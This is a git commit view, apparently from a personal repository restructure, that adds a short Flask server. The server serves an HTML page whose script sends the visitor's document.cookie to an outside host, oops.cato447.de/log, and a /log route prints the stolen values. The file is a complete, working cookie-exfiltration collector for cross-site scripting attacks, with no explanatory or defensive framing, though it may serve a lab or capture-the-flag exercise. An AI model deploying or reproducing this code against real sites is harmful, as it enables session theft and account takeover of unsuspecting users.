changed repo structure

This commit is contained in:
2025-06-06 02:50:04 +02:00
parent e887de976a
commit 6e6ee357b8
8848 changed files with 2089898 additions and 9 deletions

View File

@@ -0,0 +1,23 @@
from flask import Flask, request
app = Flask(__name__)
@app.route("/log")
def log():
print(request.args.get("c"))
return "", 204
@app.route("/payload")
def payload():
print("Sending payload")
return """<!DOCTYPE html>
<html>
<body>
<script>
new Image().src = 'http://oops.cato447.de/log?c=' + document.cookie;
</script>
</body>
</html>"""
app.run(host="0.0.0.0", port=8025)